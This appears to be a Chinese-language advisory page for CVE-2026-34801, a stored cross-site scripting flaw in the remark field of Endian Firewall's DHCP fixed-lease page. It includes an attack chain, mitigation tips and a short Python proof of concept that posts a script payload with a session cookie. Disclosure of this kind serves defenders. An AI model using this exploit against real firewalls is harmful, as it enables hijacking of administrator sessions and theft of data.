CVE-2026-34801 CVSS 6.4 中危

CVE-2026-34801: Endian Firewall 存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34801

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25 及更早版本在 DHCP 固定租约管理功能中存在存储型跨站脚本（XSS）漏洞。由于系统未对用户输入的 remark 参数进行严格的过滤和转义，经过身份认证的低权限攻击者可以注入恶意 JavaScript 代码。这些脚本会被持久化存储在服务器端，并在其他管理员或用户访问受影响页面时自动触发执行，进而可能导致会话劫持或敏感数据泄露。

技术细节

该漏洞的根本原因在于应用程序在处理 DHCP 固定租约配置请求时，缺乏对“remark”字段的输出编码。攻击者利用低权限账户登录后，可向 `/manage/dhcp/fixed_leases/` 接口发送特制的数据包，将 HTML/JavaScript 代码注入到 remark 参数中。后端系统未经过安全处理直接将该数据存储至数据库。当具有更高权限的管理员访问 DHCP 列表页面时，浏览器会解析存储的恶意脚本并在受害者的上下文中执行。鉴于 CVSS 向量中的 S:C（范围变更），攻击者可能利用此漏洞突破浏览器的同源策略限制，读取或修改管理员权限下的数据，甚至进一步控制管理后台，对内网安全构成严重威胁。

攻击链分析

STEP 1

步骤1：身份认证

攻击者使用获取的有效凭证登录 Endian Firewall 管理界面。

STEP 2

步骤2：漏洞利用

攻击者导航到 DHCP 固定租约页面，并在 remark 参数中注入恶意 JavaScript 代码。

STEP 3

步骤3：数据存储

后端服务器接收请求并将未经过滤的恶意代码存储在数据库中。

STEP 4

步骤4：触发执行

当管理员或其他用户访问 DHCP 列表页面时，恶意脚本在其浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-34801
# Description: Stored XSS via the remark parameter in Endian Firewall

import requests

target_url = "https://<target_ip>/manage/dhcp/fixed_leases/"
# Attacker payload to execute JavaScript
payload = '<script>alert("CVE-2026-34801 XSS");</script>'

# Attacker needs to be authenticated (session cookie required)
cookies = {
    "session_id": "valid_session_cookie_here"
}

# Data to be sent in the POST request
data = {
    "mac_address": "00:11:22:33:44:55",
    "ip_address": "192.168.1.100",
    "remark": payload  # Injection point
}

try:
    response = requests.post(target_url, data=data, cookies=cookies, verify=False)
    if response.status_code == 200:
        print("Payload injected successfully. Check the fixed leases page.")
    else:
        print(f"Failed to inject payload. Status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

建议管理员暂时限制对 DHCP 管理页面的访问权限，仅允许可信人员访问。在官方修复补丁发布前，应检查现有的 DHCP 租约记录，确认是否存在异常的 remark 内容并将其删除。同时，建议用户在访问管理后台时使用具备 XSS 防护功能的浏览器插件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表